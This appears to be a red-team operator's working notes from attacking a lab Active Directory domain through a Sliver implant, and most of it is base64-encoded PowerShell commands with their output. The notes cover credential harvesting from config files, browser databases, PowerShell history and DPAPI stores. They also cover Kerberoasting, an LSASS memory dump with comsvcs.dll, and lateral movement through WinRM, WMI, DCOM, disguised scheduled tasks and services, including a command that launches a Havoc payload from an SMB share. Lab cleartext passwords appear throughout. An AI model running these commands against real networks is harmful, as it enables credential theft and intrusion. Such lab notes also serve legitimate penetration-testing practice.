Looks like it worked, just no findings
List DB connection details
cat <<'CMD' | base64 -w 0
Get-ChildItem C:\inetpub\ -Recurse -Include web.config -ErrorAction SilentlyContinue | Select-String -Pattern "connectionString"
CMD
sharpsh -t 40 -- '-e -c R2V0LUNoaWxkSXRlbSBDOlxpbmV0cHViXCAtUmVjdXJzZSAtSW5jbHVkZSB3ZWIuY29uZmlnIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVlIHwgU2VsZWN0LVN0cmluZyAtUGF0dGVybiAiY29ubmVjdGlvblN0cmluZyIK'
Looks like it worked, just no findings
List FileZilla files
cat <<'CMD' | base64 -w 0
Get-ChildItem C:\Users\*\AppData\Roaming\FileZilla\ -Include sitemanager.xml,recentservers.xml -ErrorAction SilentlyContinue
CMD
sharpsh -t 20 -- '-e -c R2V0LUNoaWxkSXRlbSBDOlxVc2Vyc1wqXEFwcERhdGFcUm9hbWluZ1xGaWxlWmlsbGFcIC1JbmNsdWRlIHNpdGVtYW5hZ2VyLnhtbCxyZWNlbnRzZXJ2ZXJzLnhtbCAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQo='
Looks like it worked, just no findings
POWERSHELL HISTORY
Get the PowerShell history path for current user
cat <<'CMD' | base64 -w 0
(Get-PSReadlineOption).HistorySavePath
CMD
sharpsh -t 20 -- '-e -c KEdldC1QU1JlYWRsaW5lT3B0aW9uKS5IaXN0b3J5U2F2ZVBhdGgK'
C:\Users\jeor.mormont\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\Default Host_history.txt
Download the history file like so (the interactive console writes `ConsoleHost_history.txt` in the same directory, which is the file to fetch; the `Default Host_history.txt` name reported above appears to come from the host sharpsh runs in):
download C:/Users/jeor.mormont/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt
Search all users’ PowerShell history
cat <<'CMD' | base64 -w 0
Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue | ForEach-Object { Write-Output "`n=== History for $($_.FullName) ===" Get-Content $_.FullName | Select-String -Pattern "password|credential|username|pwd" -CaseSensitive:$false }
CMD
sharpsh -i -t 20 -- '-e -c R2V0LUNoaWxkSXRlbSBDOlxVc2Vyc1wqXEFwcERhdGFcUm9hbWluZ1xNaWNyb3NvZnRcV2luZG93c1xQb3dlclNoZWxsXFBTUmVhZExpbmVcQ29uc29sZUhvc3RfaGlzdG9yeS50eHQgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUgfCBGb3JFYWNoLU9iamVjdCB7IFdyaXRlLU91dHB1dCAiYG49PT0gSGlzdG9yeSBmb3IgJCgkXy5GdWxsTmFtZSkgPT09IiBHZXQtQ29udGVudCAkXy5GdWxsTmFtZSB8IFNlbGVjdC1TdHJpbmcgLVBhdHRlcm4gInBhc3N3b3JkfGNyZWRlbnRpYWx8dXNlcm5hbWV8cHdkIiAtQ2FzZVNlbnNpdGl2ZTokZmFsc2UgfQo='
Looks like it worked, just no findings
BROWSER CREDS
Chrome password database location
cat <<'CMD' | base64 -w 0
$chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
CMD
sharpsh -t 20 -- '-e -c JGNocm9tZVBhdGggPSAiJGVudjpVU0VSUFJPRklMRVxBcHBEYXRhXExvY2FsXEdvb2dsZVxDaHJvbWVcVXNlciBEYXRhXERlZmF1bHRcTG9naW4gRGF0YSIK'
Copy the database (can’t read it directly as Chrome locks it)
cat <<'CMD' | base64 -w 0
Copy-Item $chromePath C:\temp\ChromePasswords.db
CMD
sharpsh -t 20 -- '-e -c Q29weS1JdGVtICRjaHJvbWVQYXRoIEM6XHRlbXBcQ2hyb21lUGFzc3dvcmRzLmRiCg=='
Cached Domain Credentials
See [[#Also save SECURITY for cached domain credentials]]
Crack with [[Hashcat#Domain Cached Creds]]
CREDS MANAGER & DPAPI
List stored credentials
cat <<'CMD' | base64 -w 0
cmdkey /list
CMD
sharpsh -t 20 -- '-e -c Y21ka2V5IC9saXN0Cg=='
Currently stored credentials:
Target: WindowsLive:target=virtualapp/didlogical
Type: Generic
User: 02nqteagqddqtlqt
Local machine persistence
Credential Manager files location
cat <<'CMD' | base64 -w 0
Get-ChildItem C:\Users\*\AppData\Local\Microsoft\Credentials\ -ErrorAction SilentlyContinue
CMD
sharpsh -t 20 -- '-e -c R2V0LUNoaWxkSXRlbSBDOlxVc2Vyc1wqXEFwcERhdGFcTG9jYWxcTWljcm9zb2Z0XENyZWRlbnRpYWxzXCAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQo='
Directory: C:\Users\jeor.mormont\AppData\Local\Microsoft
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 1/11/2026 7:37 AM Credentials
Directory: C:\Users\jeor.mormont\AppData\Local\Microsoft
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 12/6/2025 1:59 PM Credentials
cat <<'CMD' | base64 -w 0
Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Credentials\ -ErrorAction SilentlyContinue
CMD
sharpsh -t 20 -- '-e -c R2V0LUNoaWxkSXRlbSBDOlxVc2Vyc1wqXEFwcERhdGFcUm9hbWluZ1xNaWNyb3NvZnRcQ3JlZGVudGlhbHNcIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVlCg=='
Directory: C:\Users\jeor.mormont\AppData\Roaming\Microsoft
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 1/11/2026 7:37 AM Credentials
Directory: C:\Users\jeor.mormont\AppData\Roaming\Microsoft
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 12/6/2025 1:59 PM Credentials
Kerberoasting: Extracting Service Account Credentials
cat <<'CMD' | base64 -w 0
([ADSISearcher]"(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512))").FindAll() |
ForEach-Object {
[pscustomobject]@{
Username = $_.Properties.samaccountname[0]
SPN = $_.Properties.serviceprincipalname[0]
PasswordLastSet = [datetime]::FromFileTime([int64]$_.Properties.pwdlastset[0])
}
} | Format-Table -AutoSize
CMD
sharpsh -i -t 20 -- '-e -c KFtBRFNJU2VhcmNoZXJdIigmKHNlcnZpY2VQcmluY2lwYWxOYW1lPSopKFVzZXJBY2NvdW50Q29udHJvbDoxLjIuODQwLjExMzU1Ni4xLjQuODAzOj01MTIpKSIpLkZpbmRBbGwoKSB8CiAgRm9yRWFjaC1PYmplY3QgewogICAgW3BzY3VzdG9tb2JqZWN0XUB7CiAgICAgIFVzZXJuYW1lICAgICAgICA9ICRfLlByb3BlcnRpZXMuc2FtYWNjb3VudG5hbWVbMF0KICAgICAgU1BOICAgICAgICAgICAgID0gJF8uUHJvcGVydGllcy5zZXJ2aWNlcHJpbmNpcGFsbmFtZVswXQogICAgICBQYXNzd29yZExhc3RTZXQgPSBbZGF0ZXRpbWVdOjpGcm9tRmlsZVRpbWUoW2ludDY0XSRfLlByb3BlcnRpZXMucHdkbGFzdHNldFswXSkKICAgIH0KICB9IHwgRm9ybWF0LVRhYmxlIC1BdXRvU2l6ZQo='
Username SPN
-------- ---
krbtgt kadmin/changepw
sansa.stark HTTP/eyrie.north.sevenkingdoms.local
jon.snow CIFS/thewall.north.sevenkingdoms.local
sql_svc MSSQLSvc/castelblack.north.sevenkingdoms.local
Request TGS tickets for all discovered SPNs
cat <<'CMD' | base64 -w 0
Add-Type -AssemblyName System.IdentityModel; $results = ([adsisearcher]"(&(objectCategory=person)(servicePrincipalName=*))").FindAll(); $results | ForEach-Object { $spn = $_.Properties['serviceprincipalname'][0]; $username = $_.Properties['samaccountname'][0]; Write-Output "[*] Requesting ticket for $spn ($username)"; try { $ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn; Write-Output "[+] Ticket requested successfully" } catch { Write-Output "[-] Failed to request ticket: $($_.Exception.Message)" } }
CMD
sharpsh -i -t 20 -- '-e -c <BASE64-OF-THE-COMMAND-ABOVE>'
Cached Tickets: (5)
#0> Client: jeor.mormont @ NORTH.SEVENKINGDOMS.LOCAL
Server: krbtgt/NORTH.SEVENKINGDOMS.LOCAL @ NORTH.SEVENKINGDOMS.LOCAL
KerbTicket Encryption Type: (18) AES256_CTS_HMAC_SHA1_96
Ticket Flags: 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 1/14/2026 5:38:42
End Time: 1/14/2026 15:38:42
Renew Time: 1/21/2026 5:38:42
Session Key Type: (18) AES256_CTS_HMAC_SHA1_96
Cache Flags: 0x1 -> PRIMARY
Kdc Called: winterfell.north.sevenkingdoms.local
#1> Client: jeor.mormont @ NORTH.SEVENKINGDOMS.LOCAL
Server: MSSQLSvc/castelblack.north.sevenkingdoms.local @ NORTH.SEVENKINGDOMS.LOCAL
KerbTicket Encryption Type: (23) RC4_HMAC_NT
Ticket Flags: 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 1/14/2026 5:38:42
End Time: 1/14/2026 15:38:42
Renew Time: 1/21/2026 5:38:42
Session Key Type: (23) RC4_HMAC_NT
Cache Flags: 0
Kdc Called: winterfell.north.sevenkingdoms.local
...
c2tc-klist
If you haven’t already dumped LSASS, do it now
cat <<'CMD' | base64 -w 0
$lsass = Get-Process lsass;$lsassPid = $lsass.Id;rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsassPid C:\temp\lsass.dmp full
CMD
sharpsh -t 20 -- '-e -c JGxzYXNzID0gR2V0LVByb2Nlc3MgbHNhc3M7JGxzYXNzUGlkID0gJGxzYXNzLklkO3J1bmRsbDMyLmV4ZSBDOlxXaW5kb3dzXFN5c3RlbTMyXGNvbXN2Y3MuZGxsLCBNaW5pRHVtcCAkbHNhc3NQaWQgQzpcdGVtcFxsc2Fzcy5kbXAgZnVsbAo='
If privileged, should see lsass.dmp in C:\temp
Move to kali
download lsass.dmp
and run:
pypykatz lsa minidump lsass.dmp -k kerberos_tickets
Set an SPN on an account you have write access to
This requires the ActiveDirectory module or direct LDAP manipulation
cat <<'CMD' | base64 -w 0
Set-ADUser -Identity targetuser -ServicePrincipalNames @{Add="HTTP/fake.domain.local"}
CMD
sharpsh -t 20 -- '-e -c '
Request ticket for the SPN you just added
cat <<'CMD' | base64 -w 0
$ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/fake.domain.local"
CMD
sharpsh -t 20 -- '-e -c '
After extracting and cracking, clean up
cat <<'CMD' | base64 -w 0
Set-ADUser -Identity targetuser -ServicePrincipalNames @{Remove="HTTP/fake.domain.local"}
CMD
sharpsh -t 20 -- '-e -c '
LATERAL MOVEMENT
Test if WinRM is accessible on the target
cat <<'CMD' | base64 -w 0
Test-WSMan -ComputerName CASTELBLACK
CMD
sharpsh -t 20 -- '-e -c VGVzdC1XU01hbiAtQ29tcHV0ZXJOYW1lIENBU1RFTEJMQUNLCg=='
wsmid : .../wsman/identity/1/wsmanidentity.xsd
ProtocolVersion : ...dmtf.org/wbem/wsman/1/wsman.xsd
ProductVendor : Microsoft Corporation
ProductVersion : OS: 0.0.0 SP: 0.0 Stack: 3.0
Start an interactive PowerShell session on remote system
Enter-PSSession -ComputerName TARGET-PC -Credential (Get-Credential)
Execute a single command remotely
cat <<'CMD' | base64 -w 0
Invoke-Command -ComputerName CASTELBLACK -ScriptBlock { whoami }
CMD
sharpsh -t 20 -- '-e -c SW52b2tlLUNvbW1hbmQgLUNvbXB1dGVyTmFtZSBDQVNURUxCTEFDSyAtU2NyaXB0QmxvY2sgeyB3aG9hbWkgfQo='
north\jeor.mormont
Create a credential object
cat <<'CMD' | base64 -w 0
Invoke-Command -ComputerName CASTELBLACK -Credential (New-Object System.Management.Automation.PSCredential('north\jeor.mormont',(ConvertTo-SecureString '_L0ngCl@w_' -AsPlainText -Force))) -ScriptBlock { whoami }
CMD
sharpsh -i -t 20 -- '-e -c SW52b2tlLUNvbW1hbmQgLUNvbXB1dGVyTmFtZSBDQVNURUxCTEFDSyAtQ3JlZGVudGlhbCAoTmV3LU9iamVjdCBTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTQ3JlZGVudGlhbCgnbm9ydGhcamVvci5tb3Jtb250JywoQ29udmVydFRvLVNlY3VyZVN0cmluZyAnX0wwbmdDbEB3XycgLUFzUGxhaW5UZXh0IC1Gb3JjZSkpKSAtU2NyaXB0QmxvY2sgeyB3aG9hbWkgfQo='
north\jeor.mormont
One of the most powerful aspects of PowerShell Remoting is that you can target multiple systems simultaneously:
Execute command on multiple systems
cat <<'CMD' | base64 -w 0
$targets=@("KINGSLANDING", "WINTERFELL", "CASTELBLACK"); Invoke-Command -ComputerName $targets -Credential (New-Object System.Management.Automation.PSCredential('north\jeor.mormont',(ConvertTo-SecureString '_L0ngCl@w_' -AsPlainText -Force))) -ScriptBlock { pwd }
CMD
sharpsh -i -t 20 -- '-e -c '
Don't think this works with sliver.
Execute a local script file on remote systems
cat <<'CMD' | base64 -w 0
Invoke-Command -ComputerName TARGET-PC -FilePath C:\scripts\enumeration.ps1
CMD
sharpsh -i -t 20 -- '-e -c '
Execute a script file on remote systems via smb
cat <<'CMD' | base64 -w 0
powershell -ep bypass Invoke-Command -ComputerName WINTERFELL -FilePath \\192.168.56.134\share\hav0c-ps-x64.ps1
CMD
sharpsh -t 20 -- '-e -c cG93ZXJzaGVsbCAtZXAgYnlwYXNzIEludm9rZS1Db21tYW5kIC1Db21wdXRlck5hbWUgV0lOVEVSRkVMTCAtRmlsZVBhdGggXFwxOTIuMTY4LjU2LjEzNFxzaGFyZVxoYXYwYy1wcy14NjQucHMxCg=='
Create a credential object with cleartext password
cat <<'CMD' | iconv -t UTF-16LE | base64 -w 0
$password = ConvertTo-SecureString 'FightP3aceAndHonor!' -AsPlainText -Force;$cred = New-Object System.Management.Automation.PSCredential ("NORTH\eddard.stark", $password);Invoke-Command -ComputerName CASTELBLACK -Credential $cred -ScriptBlock { whoami;hostname }
CMD
sharpsh -i -t 20 -- '-e -c JABwAGEAcwBzAHcAbwByAGQAIAA9ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBTAGUAYwB1AHIAZQBTAHQAcgBpAG4AZwAgACcARgBpAGcAaAB0AFAAMwBhAGMAZQBBAG4AZABIAG8AbgBvAHIAIQAnACAALQBBAHMAUABsAGEAaQBuAFQAZQB4AHQAIAAtAEYAbwByAGMAZQA7ACQAYwByAGUAZAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFAAUwBDAHIAZQBkAGUAbgB0AGkAYQBsACAAKAAiAE4ATwBSAFQASABcAGUAZABkAGEAcgBkAC4AcwB0AGEAcgBrACIALAAgACQAcABhAHMAcwB3AG8AcgBkACkAOwBJAG4AdgBvAGsAZQAtAEMAbwBtAG0AYQBuAGQAIAAtAEMAbwBtAHAAdQB0AGUAcgBOAGEAbQBlACAAQwBBAFMAVABFAEwAQgBMAEEAQwBLACAALQBDAHIAZQBkAGUAbgB0AGkAYQBsACAAJABjAHIAZQBkACAALQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAB7ACAAdwBoAG8AYQBtAGkAOwBoAG8AcwB0AG4AYQBtAGUAIAB9AAoA'
north\eddard.stark castelblack
List remote running process to file
cat <<'CMD' | base64 -w 0
$options = New-Object System.Management.ConnectionOptions;$options.Username = "NORTH\eddard.stark";$options.Password = 'FightP3aceAndHonor!';$scope = New-Object System.Management.ManagementScope("\\CASTELBLACK\root\cimv2", $options);$scope.Connect();$processClass = New-Object System.Management.ManagementClass($scope, (New-Object System.Management.ManagementPath("Win32_Process")), $null);$processClass.InvokeMethod("Create", @("powershell.exe -Command `"Get-Process | Out-File C:\temp\processes.txt`""));$result = $processClass.InvokeMethod("Create", @("notepad.exe"))
CMD
sharpsh -i -t 20 -- '-e -c <BASE64-OF-THE-COMMAND-ABOVE>'
download //CASTELBLACK/C$/temp/processes.txt
# This still needs cleartext, but shows how authentication works
$username = "DOMAIN\user"
$password = "P@ssw0rd123"
# Create WMI connection with explicit credentials
$options = New-Object System.Management.ConnectionOptions
$options.Username = $username
$options.Password = $password
$options.Impersonation = [System.Management.ImpersonationLevel]::Impersonate
$options.Authentication = [System.Management.AuthenticationLevel]::PacketPrivacy
$scope = New-Object System.Management.ManagementScope("\\TARGET-PC\root\cimv2", $options)
$scope.Connect()
# Execute WMI query
$query = New-Object System.Management.ObjectQuery("SELECT * FROM Win32_Process")
$searcher = New-Object System.Management.ManagementObjectSearcher($scope, $query)
$processes = $searcher.Get()
Execute a command on a remote system using WMI
cat <<'CMD' | base64 -w 0
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\temp\output.txt" -ComputerName CASTELBLACK
CMD
sharpsh -t 20 -- '-e -c SW52b2tlLVdtaU1ldGhvZCAtQ2xhc3MgV2luMzJfUHJvY2VzcyAtTmFtZSBDcmVhdGUgLUFyZ3VtZW50TGlzdCAiY21kLmV4ZSAvYyB3aG9hbWkgPiBDOlx0ZW1wXG91dHB1dC50eHQiIC1Db21wdXRlck5hbWUgQ0FTVEVMQkxBQ0sK'
cat //CASTELBLACK/C$/temp/output.txt
north\jeor.mormont
Clean up the file
rm \\CASTELBLACK\C$\temp\output.txt
Get OS information from remote system
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_OperatingSystem -ComputerName CASTELBLACK
CMD
sharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfT3BlcmF0aW5nU3lzdGVtIC1Db21wdXRlck5hbWUgQ0FTVEVMQkxBQ0sK'
SystemDirectory : C:\Windows\system32 Organization : Vagrant BuildNumber : 17763 RegisteredUser : SerialNumber : 00431-20000-00000-AA140 Version : 10.0.17763
Get running processes
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_Process -ComputerName CASTELBLACK
CMD
sharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfUHJvY2VzcyAtQ29tcHV0ZXJOYW1lIENBU1RFTEJMQUNLCg=='
__GENUS : 2
__CLASS : Win32_Process
__SUPERCLASS : CIM_Process
__DYNASTY : CIM_ManagedSystemElement
__RELPATH : Win32_Process.Handle="6952"
__PROPERTY_COUNT : 45
__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}
__SERVER : CASTELBLACK
__NAMESPACE : root\cimv2
__PATH : \\CASTELBLACK\root\cimv2:Win32_Process.Handle="6952"
Caption : notepad.exe
...
Get installed hotfixes
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_QuickFixEngineering -ComputerName CASTELBLACK
CMD
sharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfUXVpY2tGaXhFbmdpbmVlcmluZyAtQ29tcHV0ZXJOYW1lIENBU1RFTEJMQUNLCg=='
Source Description HotFixID
------ ----------- --------
CASTELBLACK Update KB4514366
CASTELBLACK Security Update KB4512577
CASTELBLACK Security Update KB4535680
WMIC from cmd
cat <<'CMD' | base64 -w 0
wmic /node:CASTELBLACK process call create "cmd.exe /c whoami > C:\Temp\whoami.txt 2>&1"
CMD
sharpsh -t 20 -- '-e -c d21pYyAvbm9kZTpDQVNURUxCTEFDSyBwcm9jZXNzIGNhbGwgY3JlYXRlICJjbWQuZXhlIC9jIHdob2FtaSA+IEM6XFRlbXBcd2hvYW1pLnR4dCAyPiYxIgo='
cat C:/temp/whoami.txt
north\jeor.mormont
DCOM
Method 1: MMC20.Application
cat <<'CMD' | base64 -w 0
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","CASTELBLACK"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c calc.exe","7")
CMD
sharpsh -i -t 20 -- '-e -c JGRjb20gPSBbU3lzdGVtLkFjdGl2YXRvcl06OkNyZWF0ZUluc3RhbmNlKFt0eXBlXTo6R2V0VHlwZUZyb21Qcm9nSUQoIk1NQzIwLkFwcGxpY2F0aW9uLjEiLCJDQVNURUxCTEFDSyIpKQokZGNvbS5Eb2N1bWVudC5BY3RpdmVWaWV3LkV4ZWN1dGVTaGVsbENvbW1hbmQoImNtZC5leGUiLCRudWxsLCIvYyBjYWxjLmV4ZSIsIjciKQo='
Calculator should pop. The “7” means “hidden window”!
Method 2: ShellWindows
cat <<'CMD' | base64 -w 0
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","CASTELBLACK"))
$item = $dcom.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)
CMD
sharpsh -i -t 20 -- '-e -c JGRjb20gPSBbU3lzdGVtLkFjdGl2YXRvcl06OkNyZWF0ZUluc3RhbmNlKFt0eXBlXTo6R2V0VHlwZUZyb21DTFNJRCgiOUJBMDU5NzItRjZBOC0xMUNGLUE0NDItMDBBMEM5MEE4RjM5IiwiQ0FTVEVMQkxBQ0siKSkKJGl0ZW0gPSAkZGNvbS5JdGVtKCkKJGl0ZW0uRG9jdW1lbnQuQXBwbGljYXRpb24uU2hlbGxFeGVjdXRlKCJjbWQuZXhlIiwiL2MgY2FsYy5leGUiLCJDOlxXaW5kb3dzXFN5c3RlbTMyIiwkbnVsbCwwKQo='
Calculator should pop. Here the final `0` argument of ShellExecute plays the role the “7” played in Method 1 (hidden window).
Method 3: ShellBrowserWindow
cat <<'CMD' | base64 -w 0
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","CASTELBLACK"))
$item = $dcom.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)
CMD
sharpsh -i -t 20 -- '-e -c JGRjb20gPSBbU3lzdGVtLkFjdGl2YXRvcl06OkNyZWF0ZUluc3RhbmNlKFt0eXBlXTo6R2V0VHlwZUZyb21DTFNJRCgiQzA4QUZEOTAtRjJBMS0xMUQxLTg0NTUtMDBBMEM5MUYzODgwIiwiQ0FTVEVMQkxBQ0siKSkKJGl0ZW0gPSAkZGNvbS5Eb2N1bWVudC5BcHBsaWNhdGlvbi5TaGVsbEV4ZWN1dGUoImNtZC5leGUiLCIvYyBjYWxjLmV4ZSIsIkM6XFdpbmRvd3NcU3lzdGVtMzIiLCRudWxsLDApCg=='
Calculator should pop. Here the final `0` argument of ShellExecute plays the role the “7” played in Method 1 (hidden window).
Scheduled Tasks for Remote Execution
cat <<'CMD' | base64 -w 0
schtasks /create /tn "WindowsUpdate" /tr "cmd.exe /c whoami > C:\temp\output.txt" /sc once /st 00:00 /S CASTELBLACK /U NORTH/jeor.mormont /P '_L0ngCl@w_'
CMD
sharpsh -i -t 20 -- '-e -c '
ERROR: This request is not supported. ??? (Note the user is written `NORTH/jeor.mormont` above, while the examples below use the `DOMAIN\username` form — worth retrying with a backslash before assuming remote schtasks is blocked.)
After creating the task, run it immediately:
schtasks /run /tn "WindowsUpdate" /S TARGET-PC /U DOMAIN\username /P password
Then clean up:
schtasks /delete /tn "WindowsUpdate" /S TARGET-PC /U DOMAIN\username /P password /F
For better OPSEC, you can configure the task to run as SYSTEM:
schtasks /create /tn "WindowsUpdate" /tr "cmd.exe /c your_command" /sc once /st 00:00 /ru SYSTEM /S TARGET-PC /U DOMAIN\username /P password
Create a scheduled task using PowerShell
Register-ScheduledTask -TaskName "SystemMaintenance" -Action (New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -Command Get-Process") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1)) -Principal (New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest) -CimSession CASTELBLACK
This creates a task that will run one minute from now as SYSTEM.
cat <<'CMD' | base64 -w 0
Register-ScheduledTask -TaskName "SystemMaintenance" -Action (New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -Command Get-Process") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1)) -Principal (New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest) -CimSession CASTELBLACK
CMD
sharpsh -i -t 20 -- '-e -c UmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtVGFza05hbWUgIlN5c3RlbU1haW50ZW5hbmNlIiAtQWN0aW9uIChOZXctU2NoZWR1bGVkVGFza0FjdGlvbiAtRXhlY3V0ZSAicG93ZXJzaGVsbC5leGUiIC1Bcmd1bWVudCAiLU5vUHJvZmlsZSAtQ29tbWFuZCBHZXQtUHJvY2VzcyIpIC1UcmlnZ2VyIChOZXctU2NoZWR1bGVkVGFza1RyaWdnZXIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuQWRkTWludXRlcygxKSkgLVByaW5jaXBhbCAoTmV3LVNjaGVkdWxlZFRhc2tQcmluY2lwYWwgLVVzZXJJZCAiU1lTVEVNIiAtTG9nb25UeXBlIFNlcnZpY2VBY2NvdW50IC1SdW5MZXZlbCBIaWdoZXN0KSAtQ2ltU2Vzc2lvbiBDQVNURUxCTEFDSwo='
TaskPath TaskName State PSComputerName
-------- -------- ----- --------------
\ SystemMaintenance Ready CASTELBLACK
Create a service on the remote system
cat <<'CMD' | base64 -w 0
sc.exe \\CASTELBLACK create UpdateService binPath= "cmd.exe /c whoami > C:\temp\output.txt" start= demand
CMD
sharpsh -t 20 -- '-e -c '
Start the service:
cat <<'CMD' | base64 -w 0
sc.exe \\CASTELBLACK start UpdateService
CMD
sharpsh -t 20 -- '-e -c '
Clean up:
cat <<'CMD' | base64 -w 0
sc.exe \\CASTELBLACK delete UpdateService
CMD
sharpsh -t 20 -- '-e -c '
cat <<'CMD' | base64 -w 0
sc.exe \\CASTELBLACK create UpdateService binPath= 'C:\Windows\System32\cmd.exe /c start /b powershell.exe -Command "Get-Process | Out-File C:\temp\processes.txt"' start= demand
CMD
sharpsh -t 20 -- '-e -c '
Start-Service has no -ComputerName parameter, so pipe from Get-Service as in the RemoteRegistry example above:
Get-Service -Name UpdateService -ComputerName CASTELBLACK | Start-Service

